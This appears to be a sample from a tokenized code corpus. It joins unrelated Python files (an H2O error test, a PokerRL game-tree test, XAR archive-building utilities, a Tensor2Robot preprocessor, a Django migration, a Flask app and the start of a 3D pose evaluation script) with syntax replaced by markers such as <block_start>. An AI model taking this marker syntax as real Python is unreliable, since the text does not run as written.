/3/ModelBuilders/gbm"<line_sep>data=mb_err.payload[0]<assert_stmt>data<is><not><none><assert_stmt>data['offset_column']<eq>'foo'<assert_stmt>mb_err.http_status<eq>412# see H2OIllegalArgumentException <assert_stmt>isinstance(mb_err.stacktrace list)<assert_stmt>len(mb_err.stacktrace)<g>10<assert_stmt>"water.exceptions.H2OModelBuilderIllegalArgumentException: Illegal argument(s) for GBM model"<in>mb_err.stacktrace[0]<assert_stmt>"ERRR on field: _offset_column: Offset column 'foo' not found in the training frame"<in>mb_err.msg<assert_stmt>mb_err.dev_msg<eq>mb_err.msg<assert_stmt>mb_err.exception_msg<eq>mb_err.msg<assert_stmt>mb_err.exception_type<eq>"water.exceptions.H2OModelBuilderIllegalArgumentException"<assert_stmt>mb_err.error_url<eq>"/3/ModelBuilders/gbm"<assert_stmt>mb_err.timestamp<g>0<assert_stmt>len(mb_err.values)<eq>4<assert_stmt>{'algo' 'error_count' 'messages' 'parameters'}<eq>set(mb_err.values.keys())<assert_stmt>mb_err.values['algo']<eq>'GBM'<assert_stmt>mb_err.values['error_count']<eq>4# no idea why 4, but adding it to test as it's interesting <assert_stmt>mb_err.values['parameters']['_offset_column']<eq>'foo'<assert_stmt>len(mb_err.values['messages'])<g>1<line_sep>msgs_lev_1=[m<for>m mb_err.values['messages']<if>m['_log_level']<eq>1]<assert_stmt>len(msgs_lev_1)<eq>2<assert_stmt>msgs_lev_1[0]<eq>msgs_lev_1[1]# it is duplicated indeed! <assert_stmt>msgs_lev_1[0]['_field_name']<eq>'_offset_column'<assert_stmt>msgs_lev_1[0]['_message']<eq>"Offset column 'foo' not found in the training frame"<line_sep># specific to H2OModelBuilderErrorV3 <assert_stmt>mb_err.error_count<eq>mb_err.values['error_count']<assert_stmt>len(mb_err.messages)<eq>len(mb_err.values['messages'])<assert_stmt>len(mb_err.parameters)<l>len(mb_err.values['parameters'])<block_end><block_end># no idea what's the difference there, outside that on the left side, parameters are accessible with the full schema pu.run_tests([test_backend_error test_model_builds_error])<line_sep>
# Copyright (c) 2019 <NAME> <import_stmt>unittest<import_from_stmt>unittest TestCase<import_stmt>numpy<as>np<import_from_stmt>PokerRL.game._.tree.PublicTree PublicTree<import_from_stmt>PokerRL.game.games StandardLeduc DiscretizedNLLeduc<import_from_stmt>PokerRL.game.wrappers HistoryEnvBuilder<class_stmt>TestGameTree(TestCase)<block_start><def_stmt>test_building self<block_start>_get_leduc_tree()<line_sep>_get_nl_leduc_tree()<block_end><def_stmt>test_vs_env_obs self<block_start><for_stmt>game ["limit" "nl"]<block_start><if_stmt>game<eq>"limit"<block_start>env,env_args=_get_new_leduc_env()<line_sep>dummy_env,env_args=_get_new_leduc_env()<line_sep>tree=_get_leduc_tree(env_args=env_args)<block_end><else_stmt><block_start>env,env_args=_get_new_nl_leduc_env()<line_sep>dummy_env,env_args=_get_new_nl_leduc_env()<line_sep>tree=_get_nl_leduc_tree(env_args=env_args)<block_end>lut_holder=StandardLeduc.get_lut_holder()<line_sep>env.reset()<line_sep>dummy_env.reset()<line_sep>node=tree.root<line_sep># RAISE .. stays preflop legal=env.get_legal_actions()<line_sep>a=2<assert_stmt>a<in>legal<line_sep>o,r,d,i=env.step(a)<line_sep>node=node.children[legal.index(a)]<line_sep>dummy_env.load_state_dict(node.env_state)<line_sep>tree_o=dummy_env.get_current_obs(is_terminal=<false>)<line_sep>env.print_obs(o)<line_sep>env.print_obs(tree_o)<assert_stmt>np.array_equal(o tree_o)<line_sep># CALL .. goes flop legal=env.get_legal_actions()<line_sep>a=1<assert_stmt>a<in>legal<line_sep>o,r,d,i=env.step(a)<line_sep>node=node.children[legal.index(1)]<line_sep>card_that_came_in_env=lut_holder.get_1d_card(env.board[0])<line_sep>node=node.children[card_that_came_in_env]<line_sep>dummy_env.load_state_dict(node.env_state)<line_sep>tree_o=dummy_env.get_current_obs(is_terminal=<false>)<assert_stmt>np.array_equal(o tree_o)<line_sep># RAISE .. stays flop legal=env.get_legal_actions()<line_sep>a=legal[-1]<assert_stmt>a<in>legal<line_sep>o,r,d,i=env.step(a)<line_sep>node=node.children[legal.index(a)]<line_sep>dummy_env.load_state_dict(node.env_state)<line_sep>tree_o=dummy_env.get_current_obs(is_terminal=<false>)<assert_stmt>np.array_equal(o tree_o)<block_end><block_end><block_end><def_stmt>_get_leduc_tree env_args=<none><block_start><if_stmt>env_args<is><none><block_start>env_args=StandardLeduc.ARGS_CLS(n_seats=2 )<block_end>env_bldr=HistoryEnvBuilder(env_cls=StandardLeduc env_args=env_args)<line_sep>_tree=PublicTree(env_bldr=env_bldr stack_size=env_args.starting_stack_sizes_list stop_at_street=<none>)<line_sep>_tree.build_tree()<for_stmt>p range(env_bldr.N_SEATS)<block_start>_tree.fill_uniform_random()<block_end>_tree.compute_ev()<line_sep>_tree.export_to_file()<line_sep>print("Tree with stack size" _tree.stack_size "has" _tree.n_nodes "nodes out of which" _tree.n_nonterm "are non-terminal.")<line_sep>print(np.mean(_tree.root.exploitability)<times>env_bldr.env_cls.EV_NORMALIZER)<line_sep><return>_tree<block_end><def_stmt>_get_nl_leduc_tree env_args=<none><block_start><if_stmt>env_args<is><none><block_start>env_args=DiscretizedNLLeduc.ARGS_CLS(n_seats=2 starting_stack_sizes_list=[1000 1000] bet_sizes_list_as_frac_of_pot=[1.0])<block_end>env_bldr=HistoryEnvBuilder(env_cls=DiscretizedNLLeduc env_args=env_args)<line_sep>_tree=PublicTree(env_bldr=env_bldr stack_size=env_args.starting_stack_sizes_list stop_at_street=<none> )<line_sep>_tree.build_tree()<for_stmt>p range(env_bldr.N_SEATS)<block_start>_tree.fill_uniform_random()<block_end>_tree.compute_ev()<line_sep>_tree.export_to_file()<line_sep>print("Tree with stack size" _tree.stack_size "has" _tree.n_nodes "nodes out of which" _tree.n_nonterm "are non-terminal.")<line_sep>print(np.mean(_tree.root.exploitability)<times>env_bldr.env_cls.EV_NORMALIZER)<line_sep><return>_tree<block_end><def_stmt>_get_new_leduc_env env_args=<none><block_start><if_stmt>env_args<is><none><block_start>env_args=StandardLeduc.ARGS_CLS(n_seats=2 starting_stack_sizes_list=[150 150] )<block_end><return>StandardLeduc(env_args=env_args is_evaluating=<true> lut_holder=StandardLeduc.get_lut_holder()) env_args<block_end><def_stmt>_get_new_nl_leduc_env env_args=<none><block_start><if_stmt>env_args<is><none><block_start>env_args=DiscretizedNLLeduc.ARGS_CLS(n_seats=2 bet_sizes_list_as_frac_of_pot=[1.0 1000.0])<block_end><return>DiscretizedNLLeduc(env_args=env_args is_evaluating=<true> lut_holder=DiscretizedNLLeduc.get_lut_holder()) env_args<block_end><if_stmt>__name__<eq>'__main__'<block_start>unittest.main()<block_end>
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved # # This source code is licensed under the BSD-style license found in the # LICENSE file in the root directory of this source tree. <import_from_future_stmt> absolute_import division print_function unicode_literals<import_stmt>collections<import_stmt>contextlib<import_stmt>errno<import_stmt>logging<import_stmt>os<import_stmt>shutil<import_stmt>stat<import_stmt>struct<import_stmt>subprocess<import_stmt>sys<import_stmt>tempfile<import_stmt>time<import_stmt>uuid<line_sep>logger=logging.getLogger("xar")<if_stmt>os.path.exists("/etc/centos-release")<block_start>NOGROUP="nobody"<block_end><else_stmt># Works for debian and darwin for sure <block_start>NOGROUP="nogroup"<block_end><def_stmt>make_uuid # ugh line length limit; we need a small uuid <block_start><return>str(uuid.uuid1()).split("-")[0]<block_end><def_stmt>_align_offset offset align=4096<block_start>"""Aligns the offset to the given alignment"""<line_sep>mask=align-1<assert_stmt>(mask&align)<eq>0<line_sep><return>(offset+mask)&(~mask)<block_end><def_stmt>find_mksquashfs # Prefer these paths, if none exist fall back to user's $PATH <block_start>paths=["/usr/sbin/mksquashfs" "/sbin/mksquashfs"]<for_stmt>path paths<block_start><if_stmt>os.path.isfile(path)<and>os.access(path os.X_OK)<block_start><return>path<block_end><block_end><return>"mksquashfs"<block_end><class_stmt>SquashfsOptions(object)<block_start><def_stmt>__init__ self<block_start>self.mksquashfs=find_mksquashfs()<line_sep>self.compression_algorithm="zstd"<line_sep>self.zstd_level=16<line_sep>self.block_size=256<times>1024<block_end><block_end><class_stmt>XarFactory(object)<block_start>"""A class for creating XAR files. Pretty straight forward; take an input directory, output file, and some metadata and produce a XAR file of the contents. """<def_stmt>__init__ self dirname output header_prefix<block_start>self.dirname=dirname<line_sep>self.output=output<line_sep>self.header_prefix=header_prefix<line_sep>self.xar_header={}<line_sep>self.uuid=<none><line_sep>self.version=<none><line_sep>self.sort_file=<none><line_sep>self.squashfs_options=SquashfsOptions()<block_end><def_stmt>go self<block_start>"Make the XAR file."<line_sep>logger.info("Squashing %s to %s"%(self.dirname self.output))<if_stmt>self.uuid<is><none><block_start>self.uuid=make_uuid()<block_end><if_stmt>self.version<is><none><block_start>self.version=time.time()<block_end>tf=tempfile.NamedTemporaryFile(delete=<false>)<line_sep># Create! sqopts=self.squashfs_options<line_sep>cmd=[sqopts.mksquashfs self.dirname tf.name "-noappend" "-noI" "-noX" # is this worth it? probably "-force-uid" "nobody" "-force-gid" NOGROUP "-b" str(sqopts.block_size) "-comp" sqopts.compression_algorithm ]<if_stmt>sqopts.compression_algorithm<eq>"zstd"<block_start>cmd.extend(("-Xcompression-level" str(sqopts.zstd_level)))<block_end><if_stmt>self.sort_file<block_start>cmd.extend(["-sort" self.sort_file])<block_end><if_stmt>sys.stdout.isatty()<block_start>subprocess.check_call(cmd)<block_end><else_stmt><block_start><with_stmt>open("/dev/null" "wb")<as>f<block_start>subprocess.check_call(cmd stdout=f)<block_end><block_end>headers=[self.header_prefix]<line_sep># Take the squash file, create a header, and write it <with_stmt>open(self.output "wb")<as>of# Make a "safe" header that is easily parsed and also not # going to explode if accidentally executed. <block_start>headers.append('OFFSET="$OFFSET"')<line_sep>headers.append('UUID="$UUID"')<line_sep>headers.append('VERSION="%d"'%self.version)<for_stmt>key,val self.xar_header.items()<block_start>headers.append('%s="%s"'%(key str(val).replace('"' " ")))<block_end>headers.append("#xar_stop")<line_sep>headers.append("echo This XAR file should not be executed by sh")<line_sep>headers.append("exit 1")<line_sep>headers.append("# Actual squashfs file begins at $OFFSET")<line_sep>text_headers="\n".join(headers)+"\n"<line_sep># 128 is to account for expansion of $OFFSET and $UUID; # it's well over what they might reasonably be. header_size=_align_offset(128+len(text_headers))<line_sep>text_headers=text_headers.replace("$OFFSET" "%d"%header_size)<line_sep>text_headers=text_headers.replace("$UUID" self.uuid)<line_sep>text_headers<augadd>"\n"<times>(header_size-len(text_headers))<line_sep>of.write(text_headers.encode("UTF-8"))<line_sep># Now append the squashfs file to the header. <with_stmt>open(tf.name "rb")<as>rf<block_start><while_stmt><true><block_start>data=rf.read(1024<times>1024)<if_stmt><not>data<block_start><break><block_end>of.write(data)<block_end><block_end><block_end><block_end><block_end><def_stmt>safe_mkdir directory<block_start><try_stmt><block_start>os.makedirs(directory)<block_end><except_stmt>OSError<as>exc<block_start><if_stmt>exc.errno<ne>errno.EEXIST<block_start><raise><block_end><block_end><block_end><def_stmt>safe_remove filename<block_start><try_stmt><block_start>os.unlink(filename)<block_end><except_stmt>OSError<as>e<block_start><if_stmt>e.errno<ne>errno.ENOENT<block_start><raise><block_end><block_end><block_end><def_stmt>safe_rmtree directory<block_start><if_stmt>os.path.exists(directory)<block_start>shutil.rmtree(directory <true>)<block_end><block_end># Simplified version of Chroot from PEX <class_stmt>StagingDirectory(object)<block_start>""" Manages the staging directory. """<class_stmt>Error(Exception)<block_start><pass><block_end><def_stmt>__init__ self staging_dir=<none><block_start>self._staging=os.path.normpath(staging_dir<or>tempfile.mkdtemp())<line_sep>safe_mkdir(self._staging)<block_end><def_stmt>__deepcopy__ self memo<block_start>other=StagingDirectory()<line_sep>memo[id(self)]=other<line_sep>other.copytree(self._staging)<line_sep><return>other<block_end><def_stmt>_normalize self dst<block_start>dst=os.path.normpath(dst)<if_stmt>dst.startswith(os.sep)<or>dst.startswith("..")<block_start><raise>self.Error("Destination path '%s' is not a relative!"%dst)<block_end><return>dst<block_end><def_stmt>_ensure_parent self dst<block_start>safe_mkdir(os.path.dirname(self.absolute(dst)))<block_end><def_stmt>_ensure_not_dst self dst<block_start><if_stmt>self.exists(dst)<block_start><raise>self.Error("Destination path '%s' already exists!"%dst)<block_end><block_end><def_stmt>path self<block_start>"""Returns the root directory of the staging directory."""<line_sep><return>self._staging<block_end><def_stmt>absolute self dst=<none><block_start>"""Returns absolute path for a path relative to staging directory."""<if_stmt>dst<is><none><block_start><return>self._staging<block_end>dst=self._normalize(dst)<line_sep><return>os.path.normpath(os.path.join(self._staging dst))<block_end><def_stmt>delete self<block_start>"""Delete the staging directory."""<line_sep>safe_rmtree(self._staging)<block_end><def_stmt>copy self src dst<block_start>"""Copy src into dst under the staging directory."""<line_sep>dst=self._normalize(dst)<line_sep>self._ensure_parent(dst)<line_sep>self._ensure_not_dst(dst)<line_sep>shutil.copy2(src self.absolute(dst))<block_end><def_stmt>write self data dst mode permissions<block_start>"""Write data into dst."""<line_sep>dst=self._normalize(dst)<line_sep>self._ensure_parent(dst)<line_sep>self._ensure_not_dst(dst)<with_stmt>open(self.absolute(dst) mode)<as>f<block_start>f.write(data)<block_end>os.chmod(self.absolute(dst) permissions)<block_end>@contextlib.contextmanager<def_stmt>postprocess self src<block_start>fpath=self.absolute(src)<line_sep>st=os.stat(fpath)<line_sep>old_times=(st.st_atime st.st_mtime)<with_stmt>tempfile.NamedTemporaryFile(prefix=fpath+"." mode="w" delete=<false>)<as>outf<block_start><with_stmt>open(fpath)<as>inf<block_start><yield>inf outf<block_end>outf.flush()<line_sep>os.utime(outf.name old_times)<line_sep>shutil.copystat(fpath outf.name)<line_sep>os.rename(outf.name fpath)<block_end><block_end><def_stmt>_resolve_dst_dir self dst<block_start><if_stmt>dst<is><none># Replace the current staging directory <block_start><if_stmt>os.listdir(self._staging)<ne>[]<block_start><raise>self.Error("Staging directory is not empty!")<block_end># shutil requires that the destination directory does not exist safe_rmtree(self._staging)<line_sep>dst="."<block_end>dst=self._normalize(dst)<line_sep>self._ensure_not_dst(dst)<line_sep><return>dst<block_end><def_stmt>copytree self src dst=<none><block_start>"""Copy src dir into dst under the staging directory."""<line_sep>dst=self._resolve_dst_dir(dst)<line_sep>shutil.copytree(src self.absolute(dst))<block_end><def_stmt>symlink self link dst<block_start>"""Write symbolic link to dst under the staging directory."""<line_sep>dst=self._normalize(dst)<line_sep>self._ensure_parent(dst)<line_sep>self._ensure_not_dst(dst)<line_sep>os.symlink(link self.absolute(dst))<block_end><def_stmt>move self src dst<block_start>"""Move src into dst under the staging directory."""<line_sep>dst=self._normalize(dst)<line_sep>self._ensure_parent(dst)<line_sep>self._ensure_not_dst(dst)<line_sep>shutil.move(src self.absolute(dst))<block_end><def_stmt>exists self dst<block_start>"""Checks if dst exists under the staging directory."""<line_sep>dst=self._normalize(dst)<line_sep><return>os.path.exists(self.absolute(dst))<block_end><def_stmt>extract self zf dst=<none><block_start>"""Extracts the zipfile into dst under the staging directory."""<line_sep>dst=self._resolve_dst_dir(dst)<line_sep>abs_dst=os.path.join(self._staging dst)<line_sep>timestamps={}<for_stmt>zi zf.infolist()<block_start>filename=os.path.join(dst zi.filename)<line_sep>destination=self.absolute(filename)<line_sep>mode=zi.external_attr<rshift>16<if_stmt>stat.S_ISLNK(mode)<block_start>target=zf.read(zi).decode("utf-8")<line_sep>self.symlink(target filename)<block_end><else_stmt><block_start>self._ensure_parent(filename)<line_sep>zf.extract(zi path=abs_dst)<line_sep>os.chmod(destination stat.S_IMODE(mode))<block_end># Use the embedded timestamp for from the pyc file for the # pyc and py file; otherwise, use the timezone-less # timestamp from the zipfile (sigh). <if_stmt>filename.endswith(".pyc")<block_start>new_time=extract_pyc_timestamp(destination)<line_sep>timestamps[destination]=new_time# pyc file timestamps[destination[:-1]]=new_time# py file too <block_end><else_stmt><block_start>new_time=tuple((list(zi.date_time)+[0 0 -1]))<line_sep>timestamps[destination]=time.mktime(new_time)<block_end><block_end># Set our timestamps. <for_stmt>path,timestamp timestamps.items()<block_start><try_stmt><block_start>os.utime(path (timestamp timestamp))<block_end><except_stmt>OSError<as>e# Sometimes we had a pyc file but no py file; the utime # would fail. <block_start><if_stmt><not>path.endswith(".py")<block_start><raise>e<block_end><block_end><block_end><block_end><block_end><class_stmt>TemporaryFile(object)<block_start>"""Wrapper around a temporary file that supports deepcopy()."""<def_stmt>__init__ self<block_start><with_stmt>tempfile.NamedTemporaryFile(mode="w+" delete=<false>)<as>f<block_start>self._filename=f.name<block_end><block_end><def_stmt>open self mode=<none><block_start><return>open(self._filename mode)<block_end><def_stmt>name self<block_start><return>self._filename<block_end><def_stmt>delete self<block_start>safe_remove(self._filename)<block_end><def_stmt>__deepcopy__ self memo<block_start>other=TemporaryFile()<line_sep>memo[id(self)]=other<with_stmt>self.open("rb")<as>src other.open("wb")<as>dst<block_start>shutil.copyfileobj(src dst)<block_end><return>other<block_end><block_end># Simple class to represent a partition destination. Each destination # is a path and a uuid from which the contents come (ie, the uuid of # the spar file that contains the file that is moved into the # partition; used for symlink construction). PartitionDestination=collections.namedtuple("PartitionDestination" "staging uuid")<def_stmt>partition_files staging extension_destinations<block_start>"""Partition source_dir into multiple output directories. A partition is defined by extension_destinations which maps suffixes (such as ".debuginfo") to a PartitionDestination instance. dest_dir contains all files that aren't in a partition, and symlinks for ones that are. symlinks are relative and of the form "../../../uuid/path/to/file" so that the final symlinks are correct relative to /mnt/xar/.... """<line_sep>source_dir=staging.path()<line_sep>source_dir=source_dir.rstrip("/")<for_stmt>dirpath,_dirnames,filenames os.walk(staging.path())# path relative to source_dir; used for creating the right # file inside the staging dir <block_start>relative_dirname=dirpath[len(source_dir)+1:]<line_sep># Special case; if a file is in the root of source_dir, then # relative_dirname is empty, but that has the same number of # '/' as just 'bin', so we need to special case it the empty # value. <if_stmt><not>relative_dirname<block_start>relative_depth=1<block_end><else_stmt><block_start>relative_depth=2+relative_dirname.count("/")<block_end><for_stmt>filename filenames# Does this extension map to a separate output? <block_start>_,extension=os.path.splitext(filename)<line_sep>dest_base=extension_destinations.get(extension <none>)<line_sep># This path stays in the source staging directory <if_stmt>dest_base<is><none><block_start><continue><block_end># This file is destined for another tree, make a # relative symlink in source pointing to the # sub-xar destination. relative_path=os.path.join(relative_dirname filename)<line_sep>source_path=staging.absolute(relative_path)<line_sep>dest_base.staging.move(source_path relative_path)<line_sep>dependency_mountpoint=dest_base.uuid<line_sep>staging_symlink=os.path.join("../"<times>relative_depth dependency_mountpoint relative_path)<line_sep>logging.info("%s %s"%(staging_symlink source_path))<line_sep>staging.symlink(staging_symlink relative_path)<block_end><block_end><block_end><def_stmt>write_sort_file staging_dir extension_priorities sort_file<block_start>""" Write a sort file for mksquashfs to colocate some files at the beginning. Files are assigned priority by extension, with files earlier in the list appearing first. The result is written to the file object sort_file. mksquashfs takes the sort file with the option '-sort sort_filename'. """<for_stmt>dirpath,_dirname,filenames os.walk(staging_dir)<block_start><for_stmt>filename filenames<block_start>fn=os.path.join(dirpath filename)<for_stmt>idx,suffix enumerate(extension_priorities)<block_start><if_stmt>fn.endswith(suffix)# Default priority is 0; make ours all # negative so we can not list files with # spaces in the name, making them default # to 0 <block_start>priority=idx-len(extension_priorities)-1<line_sep><break><block_end><block_end><assert_stmt>fn.startswith(staging_dir+"/")<line_sep>fn=fn[len(staging_dir)+1:]<line_sep># Older versions of mksquashfs don't like spaces # in filenames; let them have the default priority # of 0. <if_stmt>" "<not><in>fn<block_start>sort_file.write("%s %d\n"%(fn priority))<block_end><block_end><block_end><block_end><def_stmt>extract_pyc_timestamp path<block_start>"Extract the embedded timestamp from a pyc file"<line_sep># A PYC file has a four byte header then four byte timestamp. The # timestamp must match the timestamp on the py file, otherwise the # interpreter will attempt to re-compile the py file. We extract # the timestamp to adulterate the py/pyc files before squashing # them. <with_stmt>open(path "rb")<as>fh<block_start>prefix=fh.read(8)<line_sep><return>struct.unpack(b"<I" prefix[4:])[0]<block_end><block_end><def_stmt>file_in_zip zf filename<block_start>"""Returns True if :filename: is present in the zipfile :zf:."""<try_stmt><block_start>zf.getinfo(filename)<line_sep><return><true><block_end><except_stmt>KeyError<block_start><return><false><block_end><block_end><def_stmt>yield_prefixes_reverse path<block_start>""" Yields all prefixes of :path: in reverse. list(yield_prefixes_reverse("/a/b")) == ["/a/b", "/a", "/"] list(yield_prefixes_reverse("a/b")) == ["a/b", "a", ""] """<line_sep>old=<none><while_stmt>path<ne>old<block_start><yield>path<line_sep>old=path<line_sep>path,_=os.path.split(path)<block_end><block_end>
# coding=utf-8 # Copyright 2021 The Tensor2Robot Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Lint as python3 """The abstract preprocessor, handling boilerplate validation."""<import_stmt>abc<import_from_stmt>typing Any Callable Optional Tuple<import_stmt>six<import_from_stmt>tensor2robot.utils tensorspec_utils<import_stmt>tensorflow.compat.v1<as>tf<line_sep>ModeKeys=tf.estimator.ModeKeys<class_stmt>AbstractPreprocessor(six.with_metaclass(abc.ABCMeta object))<block_start>"""A per example preprocessing function executed prior to the model_fn. Note, our preprocessor is invoked for a batch of features and labels. If the _preprocess_fn can only operate on batch_size one please use tf.map_fn as described in _preprocessor_fn. """<def_stmt>__init__ self model_feature_specification_fn=<none> model_label_specification_fn=<none> is_model_device_tpu=<false><block_start>"""Initialize an instance. The provided specifications are used both for the in and out specification. The _preprocess_fn will not alter the provided tensors. Args: model_feature_specification_fn: (Optional) A function which takes mode as an argument and returns a valid spec structure for the features, preferablely a (hierarchical) namedtuple of TensorSpecs and OptionalTensorSpecs. model_label_specification_fn: (Optional) A function which takes mode as an argument and returns a valid spec structure for the labels, preferably a (hierarchical) namedtupel of TensorSpecs and OptionalTensorSpecs. is_model_device_tpu: True if the model is operating on TPU and otherwise False. This information is useful to do type conversions and strip unnecessary information from preprocessing since no summaries are generated on TPUs. """<for_stmt>spec_generator [model_feature_specification_fn model_label_specification_fn]<block_start><for_stmt>estimator_mode [ModeKeys.TRAIN ModeKeys.PREDICT ModeKeys.EVAL]<block_start><if_stmt>spec_generator<block_start>tensorspec_utils.assert_valid_spec_structure(spec_generator(estimator_mode))<block_end><block_end><block_end>self._model_feature_specification_fn=model_feature_specification_fn<line_sep>self._model_label_specification_fn=model_label_specification_fn<line_sep>self._is_model_device_tpu=is_model_device_tpu<block_end>@property<def_stmt>model_feature_specification_fn self<block_start><return>self._model_feature_specification_fn<block_end>@model_feature_specification_fn.setter<def_stmt>model_feature_specification_fn self model_feature_specification_fn<block_start>self._model_feature_specification_fn=model_feature_specification_fn<block_end>@property<def_stmt>model_label_specification_fn self<block_start><return>self._model_label_specification_fn<block_end>@model_label_specification_fn.setter<def_stmt>model_label_specification_fn self model_label_specification_fn<block_start>self._model_label_specification_fn=model_label_specification_fn<block_end>@abc.abstractmethod<def_stmt>get_in_feature_specification self mode<block_start>"""The specification for the input features for the preprocess_fn. Arguments: mode: mode key for this feature specification Returns: A TensorSpecStruct describing the required and optional tensors. """<block_end>@abc.abstractmethod<def_stmt>get_in_label_specification self mode<block_start>"""The specification for the input labels for the preprocess_fn. Arguments: mode: mode key for this feature specification Returns: A TensorSpecStruct describing the required and optional tensors. """<block_end>@abc.abstractmethod<def_stmt>get_out_feature_specification self mode<block_start>"""The specification for the output features after executing preprocess_fn. Arguments: mode: mode key for this feature specification Returns: A TensorSpecStruct describing the required and optional tensors. """<block_end>@abc.abstractmethod<def_stmt>get_out_label_specification self mode<block_start>"""The specification for the output labels after executing preprocess_fn. Arguments: mode: mode key for this feature specification Returns: A TensorSpecStruct describing the required and optional tensors. """<block_end>@abc.abstractmethod<def_stmt>_preprocess_fn self features labels mode<block_start>"""The preprocessing function which will be executed prior to the model_fn. Note, _preprocess_fn is invoked for a batch of features and labels. If the _preprocess_fn can only operate on batch_size one please use the following pattern. def _fn(features_single_batch, labels_single_batch): # The actual implementation return = tf.map_fn( _fn, # The single batch implementation (features, labels), # Our nested structure, the first dimension unpacked dtype=(self.get_out_feature_specification(), self.get_out_labels_specification()), back_prop=False, parallel_iterations=self._parallel_iterations) Args: features: The input features extracted from a single example in our in_feature_specification format. labels: (Optional None) The input labels extracted from a single example in our in_label_specification format. mode: (ModeKeys) Specifies if this is training, evaluation or prediction. Returns: features_preprocessed: The preprocessed features, potentially adding additional tensors derived from the input features. labels_preprocessed: (Optional) The preprocessed labels, potentially adding additional tensors derived from the input features and labels. """<block_end><def_stmt>preprocess self features labels mode<block_start>"""The function which preprocesses the features and labels per example. Note, this function performs the boilerplate packing and flattening and verification of the features and labels according to our spec. The actual preprocessing is performed by _preprocess_fn. Args: features: The features of a single example. labels: (Optional None) The labels of a single example. mode: (ModeKeys) Specifies if this is training, evaluation or prediction. Returns: features_preprocessed: The preprocessed and flattened features verified to fulfill our output specs. labels_preprocessed: (Optional None) The preprocessed and flattened labels verified to fulfill our output specs. """<line_sep># First, we verify that the input features and labels fulfill our spec. # We further pack the flattened features and labels to our (hierarchical) # specification.: features=tensorspec_utils.validate_and_pack(expected_spec=self.get_in_feature_specification(mode) actual_tensors_or_spec=features ignore_batch=<true>)<if_stmt>labels<is><not><none><block_start>labels=tensorspec_utils.validate_and_pack(expected_spec=self.get_in_label_specification(mode) actual_tensors_or_spec=labels ignore_batch=<true>)<block_end>features_preprocessed,labels_preprocessed=self._preprocess_fn(features=features labels=labels mode=mode)<line_sep>features_preprocessed=tensorspec_utils.validate_and_flatten(expected_spec=self.get_out_feature_specification(mode) actual_tensors_or_spec=features_preprocessed ignore_batch=<true>)<if_stmt>labels_preprocessed<block_start>labels_preprocessed=tensorspec_utils.validate_and_flatten(expected_spec=self.get_out_label_specification(mode) actual_tensors_or_spec=labels_preprocessed ignore_batch=<true>)<block_end><return>features_preprocessed labels_preprocessed<block_end><block_end>
# -*- coding: utf-8 -*- # Generated by Django 1.11.1 on 2017-08-08 13:59 <import_from_future_stmt> unicode_literals<import_from_stmt>django.db migrations models<import_stmt>django.db.models.deletion<import_stmt>modelcluster.fields<import_stmt>wagtail.core.fields<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[('wagtailimages' '0019_delete_filter') ('wagtaildocs' '0007_merge') ('wagtailcore' '0039_collectionviewrestriction') ('pages' '0012_auto_20170606_1319') ]<line_sep>operations=[migrations.CreateModel(name='VideoPage' fields=[('page_ptr' models.OneToOneField(auto_created=<true> on_delete=django.db.models.deletion.CASCADE parent_link=<true> primary_key=<true> serialize=<false> to='wagtailcore.Page')) ('intro' wagtail.core.fields.RichTextField(blank=<true>)) ('template_string' models.CharField(choices=[(b'pages/video_gallery_page.html' b'Videos Page')] default=b'pages/video_gallery_page.html' max_length=255)) ('feed_image' models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL related_name='+' to='wagtailimages.Image')) ] options={'abstract':<false> } bases=('wagtailcore.page' ) ) migrations.CreateModel(name='VideoPageCarouselItem' fields=[('id' models.AutoField(auto_created=<true> primary_key=<true> serialize=<false> verbose_name='ID')) ('sort_order' models.IntegerField(blank=<true> editable=<false> null=<true>)) ('link_external' models.URLField(blank=<true> verbose_name=b'External link')) ('embed_url' models.URLField(blank=<true> verbose_name=b'Embed URL')) ('caption' wagtail.core.fields.RichTextField(blank=<true>)) ('image' models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL related_name='+' to='wagtailimages.Image')) ('link_document' models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.CASCADE related_name='+' to='wagtaildocs.Document')) ('link_page' models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.CASCADE related_name='+' to='wagtailcore.Page')) ('page' modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE related_name='carousel_items' to='pages.VideoPage')) ] options={'ordering':['sort_order'] 'abstract':<false> } ) ]<block_end>
<import_from_stmt>flask Flask<import_from_stmt>datetime datetime<line_sep>app=Flask(__name__)<line_sep>@app.route("/")<def_stmt>hello <block_start><return>"Hello World! "+str(datetime.now())<block_end>
""" @author: <NAME> @contact: <EMAIL> """<import_stmt>os<import_stmt>argparse<import_stmt>json<import_stmt>cv2<import_from_stmt>tqdm tqdm<import_from_stmt>torch.utils.data DataLoader<import_from_stmt>cvpack.utils.logger get_logger<import_from_stmt>model.smap SMAP<import_from_stmt>model.refinenet RefineNet<import_from_stmt>lib.utils.dataloader get_test_loader<import_from_stmt>lib.utils.comm is_main_process<import_from_stmt>exps.stage3_root2.test_util *<import_from_stmt>dataset.custom_dataset CustomDataset<import_from_stmt>config cfg<import_stmt>dapalib<def_stmt>generate_3d_point_pairs model refine_model data_loader cfg logger device output_dir=''<block_start>os.makedirs(output_dir exist_ok=<true>)<line_sep>model.eval()<if_stmt>refine_model<is><not><none><block_start>refine_model.eval()<block_end>result=dict()<line_sep>result['model_pattern']=cfg.DATASET.NAME<line_sep>result['3d_pairs']=[]<line_sep># 3d_pairs has items like{'pred_2d':[[x,y,detZ,score]...], 'gt_2d':[[x,y,Z,visual_type]...], # 'pred_3d':[[X,Y,Z,score]...], 'gt_3d':[[X,Y,X]...], # 'root_d': (abs depth of root (float value) pred by network), # 'image_path': relative image path} kpt_num=cfg.DATASET.KEYPOINT.NUM<line_sep>data=tqdm(data_loader)<if>is_main_process()<else>data_loader<for_stmt>idx,batch 